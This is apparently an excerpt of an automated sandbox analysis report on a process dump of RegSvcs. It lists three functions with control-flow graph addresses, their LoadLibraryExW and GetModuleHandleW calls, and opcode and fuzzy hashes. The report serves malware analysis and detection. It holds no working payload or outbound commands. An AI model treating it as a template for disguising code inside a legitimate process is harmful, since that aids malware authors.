                                                                                                control_flow_graph 1317 642e3d8-642e420 1319 642e422-642e425 1317->1319 1320 642e428-642e457 LoadLibraryExW 1317->1320 1319->1320 1321 642e460-642e47d 1320->1321 1322 642e459-642e45f 1320->1322 1322->1321
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?), ref: 0642E44A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.529315447.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6420000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: acb5f62dd54e24822dda28ecb41ae6865117bbdb4b6816c62e5713289282e763
                                                                                                • Instruction ID: 333bdf3c59658273ffbdb914e7a0b92c5351bf955fdcdc4052d66a77498d349a
                                                                                                • Opcode Fuzzy Hash: acb5f62dd54e24822dda28ecb41ae6865117bbdb4b6816c62e5713289282e763
                                                                                                • Instruction Fuzzy Hash: B02114BAD002199FDB10CF9AC844ADEFBF5AB48314F54841AE419AB600C379A945CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0642C70C Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1325 642c70c-642e420 1327 642e422-642e425 1325->1327 1328 642e428-642e457 LoadLibraryExW 1325->1328 1327->1328 1329 642e460-642e47d 1328->1329 1330 642e459-642e45f 1328->1330 1330->1329
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?), ref: 0642E44A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.529315447.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6420000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: 17ef9daf699f4f9ff4410c7949b1af4de694f84cd5c26ea32528c1cf2eb9026a
                                                                                                • Instruction ID: c5f788dd90e51bad07984ea79891c64f8ff8e684ef8db74d3b95fcc6eb48a181
                                                                                                • Opcode Fuzzy Hash: 17ef9daf699f4f9ff4410c7949b1af4de694f84cd5c26ea32528c1cf2eb9026a
                                                                                                • Instruction Fuzzy Hash: 141114B6D002198FDB10CF9AC844ADEFBF5EB48314F54842EE819B7610C375A945CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0642C644 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1333 642c644-642d3e8 1335 642d3f0-642d41b GetModuleHandleW 1333->1335 1336 642d3ea-642d3ed 1333->1336 1337 642d424-642d438 1335->1337 1338 642d41d-642d423 1335->1338 1336->1335 1338->1337
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0642D1DB), ref: 0642D40E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.529315447.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6420000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: 0aaedee527c27b2618c479aaaa1fa4780c76ff6d366e13609df3bb33c8facf4b
                                                                                                • Instruction ID: e23771e44b7ad4971626978ac16f0ad61888eeb011d7979948d16331f8c81840
                                                                                                • Opcode Fuzzy Hash: 0aaedee527c27b2618c479aaaa1fa4780c76ff6d366e13609df3bb33c8facf4b
                                                                                                • Instruction Fuzzy Hash: 5B11F3B5D002598FDB10CF9AC844A9EBBF4EF48214F60841AD819B7610D375A545CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%